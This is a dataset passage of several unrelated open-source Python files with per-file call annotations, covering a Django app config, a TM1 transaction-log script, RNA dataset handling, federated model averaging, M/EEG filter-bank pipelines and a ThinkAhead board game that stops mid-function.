result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ConditionalRecipientRuleFilter, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ConditionalRecipientRuleFilter):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ConditionalRecipientRuleFilter):
return True
return self.to_dict() != other.to_dict()
| [((243, 23, 243, 56), 'six.iteritems', 'six.iteritems', ({(243, 37, 243, 55): 'self.swagger_types'}, {}), '(self.swagger_types)', False, 'import six\n'), ((58, 29, 58, 44), 'docusign_esign.client.configuration.Configuration', 'Configuration', ({}, {}), '()', False, 'from docusign_esign.client.configuration import Configuration\n')] |
meshy/django-conman | conman/routes/apps.py | c739d09250d02d99068358e925ed8298a2a37a75 | from django.apps import AppConfig
from django.core.checks import register
from . import checks
class RouteConfig(AppConfig):
"""The AppConfig for conman routes."""
name = 'conman.routes'
def ready(self):
"""Register checks for conman routes."""
register(checks.polymorphic_installed)
register(checks.subclasses_available)
register(checks.subclasses_in_admin)
| [((13, 8, 13, 46), 'django.core.checks.register', 'register', ({(13, 17, 13, 45): 'checks.polymorphic_installed'}, {}), '(checks.polymorphic_installed)', False, 'from django.core.checks import register\n'), ((14, 8, 14, 45), 'django.core.checks.register', 'register', ({(14, 17, 14, 44): 'checks.subclasses_available'}, {}), '(checks.subclasses_available)', False, 'from django.core.checks import register\n'), ((15, 8, 15, 44), 'django.core.checks.register', 'register', ({(15, 17, 15, 43): 'checks.subclasses_in_admin'}, {}), '(checks.subclasses_in_admin)', False, 'from django.core.checks import register\n')] |
DJHig/TM1py-samples | Other/transactionlog entries since timestamp.py | da4050380447472a02e2a107a2c5be79ac284d0a | """
Get all TM1 transactions for all cubes starting to a specific date.
"""
import configparser
config = configparser.ConfigParser()
config.read('..\config.ini')
from datetime import datetime
from TM1py.Services import TM1Service
with TM1Service(**config['tm1srv01']) as tm1:
# Timestamp for Message-Log parsing
timestamp = datetime(year=2018, month=2, day=15, hour=16, minute=2, second=0)
# Get all entries since timestamp
entries = tm1.server.get_transaction_log_entries(since=timestamp)
# loop through entries
for entry in entries:
# Do stuff
print(entry['TimeStamp'], entry)
| [((6, 9, 6, 36), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((14, 5, 14, 37), 'TM1py.Services.TM1Service', 'TM1Service', ({}, {}), "(**config['tm1srv01'])", False, 'from TM1py.Services import TM1Service\n'), ((17, 16, 17, 81), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import datetime\n')] |
AviranLab/patteRNA | src/patteRNA/Dataset.py | 88b900844016717a71b6ec8e4f2d10d8888600ce | import logging
import numpy as np
from scipy.stats import entropy
from patteRNA.Transcript import Transcript
from patteRNA import filelib
logger = logging.getLogger(__name__)
class Dataset:
def __init__(self, fp_observations, fp_sequences=None, fp_references=None):
self.fp_obs = fp_observations
self.fp_fasta = fp_sequences
self.fp_refs = fp_references
self.rnas = dict()
self.stats = dict()
def load_rnas(self, log_flag=False):
observations_dict = filelib.parse_observations(self.fp_obs)
observations_rnas = set(observations_dict.keys())
dataset_rnas = observations_rnas
sequences_dict = None
if self.fp_fasta:
sequences_dict = filelib.parse_fasta(self.fp_fasta)
sequences_rnas = set(sequences_dict.keys())
# Cross reference input files to confirm all transcripts
for rna in observations_rnas.difference(sequences_rnas):
print('WARNING - No sequence found for RNA: {}'.format(rna))
sequences_dict[rna] = ''.join(['N'] * len(observations_dict[rna]))
for rna in sequences_rnas.difference(observations_rnas):
print('WARNING - No probing data found for RNA: {}'.format(rna))
observations_dict[rna] = np.tile(np.nan, len(sequences_dict[rna]))
dataset_rnas.update(sequences_rnas)
for rna_name in dataset_rnas:
if self.fp_fasta:
self.rnas[rna_name] = Transcript(rna_name, sequences_dict[rna_name], observations_dict[rna_name])
else:
self.rnas[rna_name] = Transcript(rna_name, 'N' * len(observations_dict[rna_name]),
observations_dict[rna_name])
if log_flag:
for rna in self.rnas:
self.rnas[rna].log_transform()
self.compute_stats()
def compute_stats(self):
"""
Parse all finite observations in the input file and compute some statistics on the data.
These statistics are mostly used to initialize parameters of the emission model before training.
"""
finite_obs = []
total_obs = 0
up_ref = 0
p_ref = 0
for rna in self.rnas:
finite_obs.extend(self.rnas[rna].obs[np.isfinite(self.rnas[rna].obs)])
total_obs += len(self.rnas[rna].obs)
up_ref += int(np.sum(self.rnas[rna].ref == 0))
p_ref += int(np.sum(self.rnas[rna].ref == 1))
self.stats['quantile_basis'] = np.linspace(0, 1, 1000)
self.stats['quantiles'] = np.quantile(finite_obs, self.stats["quantile_basis"])
self.stats['P25'], self.stats['P75'] = np.percentile(finite_obs, (25, 75))
self.stats['P40'], self.stats['P60'] = np.percentile(finite_obs, (40, 60))
self.stats['n_obs'] = len(finite_obs)
self.stats['up_ref'] = up_ref
self.stats['p_ref'] = p_ref
self.stats['total_obs'] = total_obs
self.stats['continuous_variance'] = np.var(finite_obs)
self.stats['minimum'] = np.min(finite_obs)
self.stats['maximum'] = np.max(finite_obs)
self.stats['finite_obs'] = finite_obs
self.stats['histogram_bins'] = np.linspace(self.stats['minimum'], self.stats['maximum'], 20)
self.stats['histogram'], _ = np.histogram(finite_obs,
bins=self.stats['histogram_bins'],
density=True)
def spawn_training_set(self, kl_div):
"""
Spawn a training set (smaller than or equal size to overall data) based on KL divergence criteria.
Transcripts are incrementally added to a training Dataset (high quality transcripts first) until
the training set's KL divergence from the overall data falls below the provided threshold.
"""
training_transcripts = []
training_obs = []
kl_div_set = 1.0
group_size = 20
logger.info(' ... sorting')
rnas_sd = sorted(self.rnas.values(), key=lambda transcript: transcript.density, reverse=True)
logger.info(' ... selecting')
while kl_div_set > kl_div and rnas_sd:
rnas = rnas_sd[:group_size]
rnas_sd[:group_size] = []
for rna in rnas:
training_transcripts.append(rna.name)
training_obs.extend(rna.obs[rna.mask_finite])
training_histogram, _ = np.histogram(training_obs,
bins=self.stats['histogram_bins'],
density=True)
kl_div_set = entropy(training_histogram, self.stats['histogram'])
training_set = self.spawn_set(rnas=training_transcripts)
training_set.compute_stats()
return training_set, kl_div_set
def pre_process(self, model, scoring=False):
if model.emission_model.type == 'DOM':
for rna in self.rnas:
model.emission_model.discretize(self.rnas[rna])
if scoring:
for rna in self.rnas.values():
model.e_step(rna)
rna.compute_log_B_ratios()
def get_emissions(self, model):
for rna in self.rnas:
model.emission_model.compute_emissions(self.rnas[rna])
def spawn_set(self, rnas):
spawned_set = Dataset(fp_observations=None, fp_sequences=None, fp_references=None)
spawned_set.rnas = {rna: self.rnas[rna] for rna in rnas}
return spawned_set
def spawn_reference_set(self):
spawned_set = Dataset(fp_observations=None, fp_references=None, fp_sequences=None)
references = [rna for rna in self.rnas if self.rnas[rna].ref is not None]
spawned_set.rnas = {rna: self.rnas[rna] for rna in references}
spawned_set.compute_stats()
return spawned_set
def clear(self):
self.rnas = None
self.stats = None
| [((7, 9, 7, 36), 'logging.getLogger', 'logging.getLogger', ({(7, 27, 7, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((20, 28, 20, 67), 'patteRNA.filelib.parse_observations', 'filelib.parse_observations', ({(20, 55, 20, 66): 'self.fp_obs'}, {}), '(self.fp_obs)', False, 'from patteRNA import filelib\n'), ((72, 39, 72, 62), 'numpy.linspace', 'np.linspace', ({(72, 51, 72, 52): '0', (72, 54, 72, 55): '1', (72, 57, 72, 61): '1000'}, {}), '(0, 1, 1000)', True, 'import numpy as np\n'), ((73, 34, 73, 87), 'numpy.quantile', 'np.quantile', ({(73, 46, 73, 56): 'finite_obs', (73, 58, 73, 86): "self.stats['quantile_basis']"}, {}), "(finite_obs, self.stats['quantile_basis'])", True, 'import numpy as np\n'), ((74, 47, 74, 82), 'numpy.percentile', 'np.percentile', ({(74, 61, 74, 71): 'finite_obs', (74, 73, 74, 81): '(25, 75)'}, {}), '(finite_obs, (25, 75))', True, 'import numpy as np\n'), ((75, 47, 75, 82), 'numpy.percentile', 'np.percentile', ({(75, 61, 75, 71): 'finite_obs', (75, 73, 75, 81): '(40, 60)'}, {}), '(finite_obs, (40, 60))', True, 'import numpy as np\n'), ((80, 44, 80, 62), 'numpy.var', 'np.var', ({(80, 51, 80, 61): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((81, 32, 81, 50), 'numpy.min', 'np.min', ({(81, 39, 81, 49): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((82, 32, 82, 50), 'numpy.max', 'np.max', ({(82, 39, 82, 49): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((84, 39, 84, 100), 'numpy.linspace', 'np.linspace', ({(84, 51, 84, 72): "self.stats['minimum']", (84, 74, 84, 95): "self.stats['maximum']", (84, 97, 84, 99): '20'}, {}), "(self.stats['minimum'], self.stats['maximum'], 20)", True, 'import numpy as np\n'), ((85, 37, 87, 63), 'numpy.histogram', 'np.histogram', (), '', True, 'import numpy as np\n'), ((27, 29, 27, 63), 'patteRNA.filelib.parse_fasta', 'filelib.parse_fasta', ({(27, 49, 27, 62): 'self.fp_fasta'}, {}), '(self.fp_fasta)', False, 'from patteRNA import filelib\n'), ((113, 36, 115, 62), 'numpy.histogram', 'np.histogram', (), '', True, 'import numpy as np\n'), ((116, 25, 116, 77), 'scipy.stats.entropy', 'entropy', ({(116, 33, 116, 51): 'training_histogram', (116, 53, 116, 76): "self.stats['histogram']"}, {}), "(training_histogram, self.stats['histogram'])", False, 'from scipy.stats import entropy\n'), ((43, 38, 43, 113), 'patteRNA.Transcript.Transcript', 'Transcript', ({(43, 49, 43, 57): 'rna_name', (43, 59, 43, 83): 'sequences_dict[rna_name]', (43, 85, 43, 112): 'observations_dict[rna_name]'}, {}), '(rna_name, sequences_dict[rna_name], observations_dict[rna_name])', False, 'from patteRNA.Transcript import Transcript\n'), ((69, 26, 69, 57), 'numpy.sum', 'np.sum', ({(69, 33, 69, 56): '(self.rnas[rna].ref == 0)'}, {}), '(self.rnas[rna].ref == 0)', True, 'import numpy as np\n'), ((70, 25, 70, 56), 'numpy.sum', 'np.sum', ({(70, 32, 70, 55): '(self.rnas[rna].ref == 1)'}, {}), '(self.rnas[rna].ref == 1)', True, 'import numpy as np\n'), ((67, 49, 67, 80), 'numpy.isfinite', 'np.isfinite', ({(67, 61, 67, 79): 'self.rnas[rna].obs'}, {}), '(self.rnas[rna].obs)', True, 'import numpy as np\n')] |
GYRY-NEU/CS7610-Experiments | src/Simulation/developer_0/main.py | 3731b45c4a9cba2a1d7e44d37f28d1046a38de47 | import library
import json
@library.export
def init(args):
model = [[9.2, 0.21, 0.21],
[8.2, 0.22, 0.21],
[7.2, 1.21, 2.41],
[1.2, 2.21, 0.29]]
library.put("model", model)
ROUND = 0
library.put("ROUND", ROUND)
alpha = 0.2
library.put("alpha", alpha)
@library.export
def clientUpload(args):
# get client model
client = json.loads(args["data"])
# client round
k = "round" + str(client["round"])
# save model to buckets
library.put_bucket(k, client["model"])
# if enough models
if library.count_bucket(k) > 20:
ROUND = library.get("ROUND")
# check client rounds == current rounds
if ROUND != client["round"]:
return False
# set round to -1 to prevent clients uploading to this bucket
library.put("ROUND", -1)
model = library.get("model")
list_weights = library.get_bucket(k)
model = updateModel(model, list_weights)
# save calculated model and restore round
library.put("model", model)
library.put("ROUND", ROUND+1)
return True
def updateModel(model, list_weights):
"""
list_weights : 3D list of shape : (clientNumber,modelOuter, modelInner)
It contains all the models for each client
"""
# this part will change developer to developer
# one can just take avg
# or one can discard smallest and largest than take average
# this example just takes avg without use of external library
alpha = library.get("alpha")
# getting shape of 3D array
number_clients = len(list_weights)
size_outer = len(list_weights[0])
size_inner = len(list_weights[0][0])
# constructing a new 2D array of zeros of same size
newModel = [ [0 for j in range(size_inner)] for i in range(size_outer)]
# validate new created shape
assert(len(newModel) == size_outer)
assert(len(newModel[0]) == size_inner)
# sum for all the clients
for weights in list_weights:
for outerIndex, outerList in enumerate(weights):
for innerIndex, innerVal in enumerate(outerList):
newModel[outerIndex][innerIndex] += innerVal
# average it by number of clients
for outerIndex, outerList in enumerate(newModel):
for innerIndex, innerVal in enumerate(outerList):
newModel[outerIndex][innerIndex] /= number_clients
# now update the model using the learning rate using below formula
# model = (1-a) * model + a * new_model
# Prev. part and next part could be merged for efficiency but readability they implemented with two loops
# Iterate over model
for outerIndex, outerList in enumerate(newModel):
for innerIndex, innerVal in enumerate(outerList):
model[outerIndex][innerIndex] *= 1-alpha
model[outerIndex][innerIndex] += alpha * newModel[outerIndex][innerIndex]
# Finally update round number
return model
@library.export
def getModel(args):
return library.get("model")
@library.export
def getRound(args):
return library.get("ROUND")
| [((10, 4, 10, 31), 'library.put', 'library.put', ({(10, 16, 10, 23): '"""model"""', (10, 25, 10, 30): 'model'}, {}), "('model', model)", False, 'import library\n'), ((12, 4, 12, 31), 'library.put', 'library.put', ({(12, 16, 12, 23): '"""ROUND"""', (12, 25, 12, 30): 'ROUND'}, {}), "('ROUND', ROUND)", False, 'import library\n'), ((14, 4, 14, 31), 'library.put', 'library.put', ({(14, 16, 14, 23): '"""alpha"""', (14, 25, 14, 30): 'alpha'}, {}), "('alpha', alpha)", False, 'import library\n'), ((19, 13, 19, 37), 'json.loads', 'json.loads', ({(19, 24, 19, 36): "args['data']"}, {}), "(args['data'])", False, 'import json\n'), ((25, 4, 25, 42), 'library.put_bucket', 'library.put_bucket', ({(25, 23, 25, 24): 'k', (25, 26, 25, 41): "client['model']"}, {}), "(k, client['model'])", False, 'import library\n'), ((59, 12, 59, 32), 'library.get', 'library.get', ({(59, 24, 59, 31): '"""alpha"""'}, {}), "('alpha')", False, 'import library\n'), ((100, 11, 100, 31), 'library.get', 'library.get', ({(100, 23, 100, 30): '"""model"""'}, {}), "('model')", False, 'import library\n'), ((104, 11, 104, 31), 'library.get', 'library.get', ({(104, 23, 104, 30): '"""ROUND"""'}, {}), "('ROUND')", False, 'import library\n'), ((28, 7, 28, 30), 'library.count_bucket', 'library.count_bucket', ({(28, 28, 28, 29): 'k'}, {}), '(k)', False, 'import library\n'), ((29, 16, 29, 36), 'library.get', 'library.get', ({(29, 28, 29, 35): '"""ROUND"""'}, {}), "('ROUND')", False, 'import library\n'), ((36, 8, 36, 32), 'library.put', 'library.put', ({(36, 20, 36, 27): '"""ROUND"""', (36, 29, 36, 31): '(-1)'}, {}), "('ROUND', -1)", False, 'import library\n'), ((38, 16, 38, 36), 'library.get', 'library.get', ({(38, 28, 38, 35): '"""model"""'}, {}), "('model')", False, 'import library\n'), ((40, 23, 40, 44), 'library.get_bucket', 'library.get_bucket', ({(40, 42, 40, 43): 'k'}, {}), '(k)', False, 'import library\n'), ((44, 8, 44, 35), 'library.put', 'library.put', ({(44, 20, 44, 27): '"""model"""', (44, 29, 44, 34): 'model'}, {}), "('model', model)", False, 'import library\n'), ((45, 8, 45, 37), 'library.put', 'library.put', ({(45, 20, 45, 27): '"""ROUND"""', (45, 29, 45, 36): '(ROUND + 1)'}, {}), "('ROUND', ROUND + 1)", False, 'import library\n')] |
ragingpastry/molecule-ignite | molecule_ignite/test/unit/test_driver.py | aaf005cabba9a8c933191458cf8553da9bac581d | from molecule import api
def test_driver_is_detected():
driver_name = __name__.split(".")[0].split("_")[-1]
assert driver_name in [str(d) for d in api.drivers()]
| [((6, 43, 6, 56), 'molecule.api.drivers', 'api.drivers', ({}, {}), '()', False, 'from molecule import api\n')] |
dengemann/meegpowreg | coffeine/pipelines.py | e9cc8f2372f8b8ef4b372bfea113ed0b9646cb39 | import numpy as np
from coffeine.covariance_transformers import (
Diag,
LogDiag,
ExpandFeatures,
Riemann,
RiemannSnp,
NaiveVec)
from coffeine.spatial_filters import (
ProjIdentitySpace,
ProjCommonSpace,
ProjLWSpace,
ProjRandomSpace,
ProjSPoCSpace)
from sklearn.compose import make_column_transformer
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import RidgeCV, LogisticRegression
def make_filter_bank_transformer(names, method='riemann',
projection_params=None,
vectorization_params=None,
categorical_interaction=None):
"""Generate pipeline for filterbank models.
Prepare filter bank models as used in [1]_. These models take as input
sensor-space covariance matrices computed from M/EEG signals in different
frequency bands. Then transformations are applied to improve the
applicability of linear regression techniques by reducing the impact of
field spread.
In terms of implementation, this involves 1) projection
(e.g. spatial filters) and 2) vectorization (e.g. taking the log on the
diagonal).
.. note::
The resulting model expects as inputs data frames in which different
covarances (e.g. for different frequencies) are stored inside columns
indexed by ``names``.
Other columns will be passed through by the underlying column
transformers.
The pipeline also supports fitting categorical interaction effects
after projection and vectorization steps are performed.
.. note::
All essential methods from [1]_ are implemented here. In practice,
we recommend comparing `riemann', `spoc' and `diag' as a baseline.
Parameters
----------
names : list of str
The column names of the data frame corresponding to different
covariances.
method : str
The method used for extracting features from covariances. Defaults
to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``,
``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``,
``'riemann_wasserstein'``.
projection_params : dict | None
The parameters for the projection step.
vectorization_params : dict | None
The parameters for the vectorization step.
categorical_interaction : str
The column in the input data frame containing a binary descriptor
used to fit 2-way interaction effects.
References
----------
[1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann.
Predictive regression modeling with MEG/EEG: from source power
to signals and cognitive states.
*NeuroImage*, page 116893,2020. ISSN 1053-8119.
https://doi.org/10.1016/j.neuroimage.2020.116893
"""
# put defaults here for projection and vectorization step
projection_defaults = {
'riemann': dict(scale=1, n_compo='full', reg=1.e-05),
'lw_riemann': dict(shrink=1),
'diag': dict(),
'log_diag': dict(),
'random': dict(n_compo='full'),
'naive': dict(),
'spoc': dict(n_compo='full', scale='auto', reg=1.e-05, shrink=1),
'riemann_wasserstein': dict()
}
vectorization_defaults = {
'riemann': dict(metric='riemann'),
'lw_riemann': dict(metric='riemann'),
'diag': dict(),
'log_diag': dict(),
'random': dict(),
'naive': dict(method='upper'),
'spoc': dict(),
'riemann_wasserstein': dict(rank='full')
}
assert set(projection_defaults) == set(vectorization_defaults)
if method not in projection_defaults:
raise ValueError(
f"The `method` ('{method}') you specified is unknown.")
# update defaults
projection_params_ = projection_defaults[method]
if projection_params is not None:
projection_params_.update(**projection_params)
vectorization_params_ = vectorization_defaults[method]
if vectorization_params is not None:
vectorization_params_.update(**vectorization_params)
def _get_projector_vectorizer(projection, vectorization):
return [(make_pipeline(*
[projection(**projection_params_),
vectorization(**vectorization_params_)]),
name) for name in names]
# setup pipelines (projection + vectorization step)
steps = tuple()
if method == 'riemann':
steps = (ProjCommonSpace, Riemann)
elif method == 'lw_riemann':
steps = (ProjLWSpace, Riemann)
elif method == 'diag':
steps = (ProjIdentitySpace, Diag)
elif method == 'log_diag':
steps = (ProjIdentitySpace, LogDiag)
elif method == 'random':
steps = (ProjRandomSpace, LogDiag)
elif method == 'naive':
steps = (ProjIdentitySpace, NaiveVec)
elif method == 'spoc':
steps = (ProjSPoCSpace, LogDiag)
elif method == 'riemann_wasserstein':
steps = (ProjIdentitySpace, RiemannSnp)
filter_bank_transformer = make_column_transformer(
*_get_projector_vectorizer(*steps), remainder='passthrough')
if categorical_interaction is not None:
filter_bank_transformer = ExpandFeatures(
filter_bank_transformer, expander_column=categorical_interaction)
return filter_bank_transformer
def make_filter_bank_regressor(names, method='riemann',
projection_params=None,
vectorization_params=None,
categorical_interaction=None, scaling=None,
estimator=None):
"""Generate pipeline for regression with filter bank model.
Prepare filter bank models as used in [1]_. These models take as input
sensor-space covariance matrices computed from M/EEG signals in different
frequency bands. Then transformations are applied to improve the
applicability of linear regression techniques by reducing the impact of
field spread.
In terms of implementation, this involves 1) projection
(e.g. spatial filters) and 2) vectorization (e.g. taking the log on the
diagonal).
.. note::
The resulting model expects as inputs data frames in which different
covarances (e.g. for different frequencies) are stored inside columns
indexed by ``names``.
Other columns will be passed through by the underlying column
transformers.
The pipeline also supports fitting categorical interaction effects
after projection and vectorization steps are performed.
.. note::
All essential methods from [1]_ are implemented here. In practice,
we recommend comparing `riemann', `spoc' and `diag' as a baseline.
Parameters
----------
names : list of str
The column names of the data frame corresponding to different
covariances.
method : str
The method used for extracting features from covariances. Defaults
to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``,
``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``,
``'riemann_wasserstein'``.
projection_params : dict | None
The parameters for the projection step.
vectorization_params : dict | None
The parameters for the vectorization step.
categorical_interaction : str
The column in the input data frame containing a binary descriptor
used to fit 2-way interaction effects.
scaling : scikit-learn Transformer object | None
Method for re-rescaling the features. Defaults to None. If None,
StandardScaler is used.
estimator : scikit-learn Estimator object.
The estimator object. Defaults to None. If None, RidgeCV
is performed with default values.
References
----------
[1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann.
Predictive regression modeling with MEG/EEG: from source power
to signals and cognitive states.
*NeuroImage*, page 116893,2020. ISSN 1053-8119.
https://doi.org/10.1016/j.neuroimage.2020.116893
"""
filter_bank_transformer = make_filter_bank_transformer(
names=names, method=method, projection_params=projection_params,
vectorization_params=vectorization_params,
categorical_interaction=categorical_interaction
)
scaling_ = scaling
if scaling_ is None:
scaling_ = StandardScaler()
estimator_ = estimator
if estimator_ is None:
estimator_ = RidgeCV(alphas=np.logspace(-3, 5, 100))
filter_bank_regressor = make_pipeline(
filter_bank_transformer,
scaling_,
estimator_
)
return filter_bank_regressor
def make_filter_bank_classifier(names, method='riemann',
projection_params=None,
vectorization_params=None,
categorical_interaction=None, scaling=None,
estimator=None):
"""Generate pipeline for classification with filter bank model.
Prepare filter bank models as used in [1]_. These models take as input
sensor-space covariance matrices computed from M/EEG signals in different
frequency bands. Then transformations are applied to improve the
applicability of linear regression techniques by reducing the impact of
field spread.
In terms of implementation, this involves 1) projection
(e.g. spatial filters) and 2) vectorization (e.g. taking the log on the
diagonal).
.. note::
The resulting model expects as inputs data frames in which different
covarances (e.g. for different frequencies) are stored inside columns
indexed by ``names``.
Other columns will be passed through by the underlying column
transformers.
The pipeline also supports fitting categorical interaction effects
after projection and vectorization steps are performed.
.. note::
All essential methods from [1]_ are implemented here. In practice,
we recommend comparing `riemann', `spoc' and `diag' as a baseline.
Parameters
----------
names : list of str
The column names of the data frame corresponding to different
covariances.
method : str
The method used for extracting features from covariances. Defaults
to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``,
``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``,
``'riemann_wasserstein'``.
projection_params : dict | None
The parameters for the projection step.
vectorization_params : dict | None
The parameters for the vectorization step.
categorical_interaction : str
The column in the input data frame containing a binary descriptor
used to fit 2-way interaction effects.
scaling : scikit-learn Transformer object | None
Method for re-rescaling the features. Defaults to None. If None,
StandardScaler is used.
estimator : scikit-learn Estimator object.
The estimator object. Defaults to None. If None, LogisticRegression
is performed with default values.
References
----------
[1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann.
Predictive regression modeling with MEG/EEG: from source power
to signals and cognitive states.
*NeuroImage*, page 116893,2020. ISSN 1053-8119.
https://doi.org/10.1016/j.neuroimage.2020.116893
"""
filter_bank_transformer = make_filter_bank_transformer(
names=names, method=method, projection_params=projection_params,
vectorization_params=vectorization_params,
categorical_interaction=categorical_interaction
)
scaling_ = scaling
if scaling_ is None:
scaling_ = StandardScaler()
estimator_ = estimator
if estimator_ is None:
estimator_ = LogisticRegression(solver='liblinear')
filter_bank_regressor = make_pipeline(
filter_bank_transformer,
scaling_,
estimator_
)
return filter_bank_regressor
| [((233, 28, 237, 5), 'sklearn.pipeline.make_pipeline', 'make_pipeline', ({(234, 8, 234, 31): 'filter_bank_transformer', (235, 8, 235, 16): 'scaling_', (236, 8, 236, 18): 'estimator_'}, {}), '(filter_bank_transformer, scaling_, estimator_)', False, 'from sklearn.pipeline import make_pipeline\n'), ((321, 28, 325, 5), 'sklearn.pipeline.make_pipeline', 'make_pipeline', ({(322, 8, 322, 31): 'filter_bank_transformer', (323, 8, 323, 16): 'scaling_', (324, 8, 324, 18): 'estimator_'}, {}), '(filter_bank_transformer, scaling_, estimator_)', False, 'from sklearn.pipeline import make_pipeline\n'), ((148, 34, 149, 77), 'coffeine.covariance_transformers.ExpandFeatures', 'ExpandFeatures', (), '', False, 'from coffeine.covariance_transformers import Diag, LogDiag, ExpandFeatures, Riemann, RiemannSnp, NaiveVec\n'), ((227, 19, 227, 35), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((315, 19, 315, 35), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((319, 21, 319, 59), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import RidgeCV, LogisticRegression\n'), ((231, 36, 231, 59), 'numpy.logspace', 'np.logspace', ({(231, 48, 231, 50): '-3', (231, 52, 231, 53): '5', (231, 55, 231, 58): '100'}, {}), '(-3, 5, 100)', True, 'import numpy as np\n')] |
dysomni/aima-python | submissions/Chouard/mygames.py | c67104e50007ec5ac2a9aa37f0cb972cb6315528 | from games import Game
from math import nan, isnan
from queue import PriorityQueue
from copy import deepcopy
from utils import isnumber
from grading.util import print_table
class GameState:
def __init__(self, to_move, position, board, label=None):
self.to_move = to_move
self.position = position
self.board = board
self.label = label
self.scores = {'H': 0, 'V': 0}
def __str__(self):
if self.label == None:
return super(GameState, self).__str__()
return self.label
class Move:
def __init__(self, r, c, v):
self.row = r
self.col = c
self.value = v
def rcv(self):
return self.row, self.col, self.value
def __lt__(self, other):
return self.value > other.value
def q2list(mq):
list = []
while not mq.empty():
list.append(mq.get(1).rcv())
return list
def movesInRow(board, r):
mQueue = PriorityQueue()
row = board[r]
for c in range(len(row)):
if isnan(row[c]):
continue
v = row[c]
move = Move(r, c, v)
mQueue.put(move)
return q2list(mQueue)
def movesInCol(board, c):
mQueue = PriorityQueue()
for r in range(len(board)):
if isnan(board[r][c]):
continue
v = board[r][c]
move = Move(r, c, v)
mQueue.put(move)
return q2list(mQueue)
class ThinkAhead(Game):
"""
An implementation of ThinkAhead
"""
def __init__(self, state):
self.initial = state
def actions(self, state):
"Legal moves are any square not yet taken."
r, c = state.position
if state.to_move == 'H':
moves = movesInRow(state.board, r)
return moves
if state.to_move == 'V':
moves = movesInCol(state.board, c)
return moves
return []
# defines the order of play
def opponent(self, player):
if player == 'H':
return 'V'
if player == 'V':
return 'H'
return None
def result(self, state, move):
r, c, v = move
assert state.board[r][c] == v
currMover = state.to_move
nextMover = self.opponent(currMover)
newState = deepcopy(state)
newState.to_move = nextMover
newState.position = r, c
newState.board[r][c] = nan
newState.scores[currMover] += v
return newState
def utility(self, state, player):
"Player relative score"
opponent = self.opponent(player)
return state.scores[player] - state.scores[opponent]
def terminal_test(self, state):
"A state is terminal if it is won or there are no empty squares."
return len(self.actions(state)) == 0
def display(self, state):
print_table(state.board, njust='center', sep=',')
print('Score: ' + str(state.scores))
won = GameState(
to_move='H',
position=(0, 1),
board=[[nan, nan],
[9, nan]],
label='won'
)
won.scores = {'H': 9, 'V': 0}
lost = GameState(
to_move='V',
position=(0, 1),
board=[[nan, nan],
[9, nan]],
label='lost'
)
lost.scores = {'H': 0, 'V': 9}
winin1 = GameState(
to_move='H',
position=(1, 1),
board=[[nan, nan],
[9, nan]],
label='winin1'
)
losein1 = GameState(
to_move='V',
position=(0, 0),
board=[[nan, nan],
[9, nan]],
label='losein1'
)
winin2 = GameState(
to_move='H',
position=(0, 0),
board=[[nan, 3, 2],
[nan, 9, nan],
[nan, nan, 1]],
label='winin2'
)
losein2 = GameState(
to_move='V',
position=(0, 0),
board=[[nan, nan, nan],
[3, 9, nan],
[2, nan, 1]],
label='losein2'
)
losein2.maxDepth = 3
# http://www.kongregate.com/games/zolli/thinkahead-brain-trainer
stolen = GameState(
to_move='H',
position=(3, 1),
board=[[3, 8, 9, 5],
[9, 1, 3, 2],
[8, 6, 4, 4],
[9, nan, 1, 5]],
label='stolen'
)
choose1 = GameState(
to_move='H',
position=(1, 0),
board=[[3, 8, 9, 5],
[nan, 1, 3, 2],
[8, 6, 4, 4],
[nan, nan, 1, 5]],
label='choose1'
)
winby10 = GameState(
to_move='H',
position=(2, 0),
board=[[nan, nan, nan, nan],
[nan, nan, nan, nan],
[nan, 6, 4, 5],
[nan, nan, 1, 3]],
label='winby10'
)
thinkA = ThinkAhead(stolen)
def availableMoves(board):
sides = ['T', 'B', 'L', 'R']
moves = PriorityQueue()
for row in range(0, len(board)):
for col in range(0, len(board)):
if board[row][col]['winner'] == '':
for side in sides:
if side not in board[row][col]['lines']:
moves.put((row, col, side))
moveList = []
while not moves.empty():
moveList.append(moves.get(1))
return moveList
def applyMove(board, size, row, col, side, currMover):
board[row][col]['lines'].append(side)
if row <= size - 1 and row != 0 and side == 'T':
board[row - 1][col]['lines'].append('B')
if row >= 0 and row != size - 1 and side == 'B':
board[row + 1][col]['lines'].append('T')
if col <= size - 1 and col != 0 and side == 'L':
board[row][col - 1]['lines'].append('R')
if col >= 0 and col != size - 1 and side == 'R':
board[row][col + 1]['lines'].append('L')
sides = ['T', 'B', 'L', 'R']
complete = True
for side in sides:
if side in board[row][col]['lines']:
continue
complete = False
if complete:
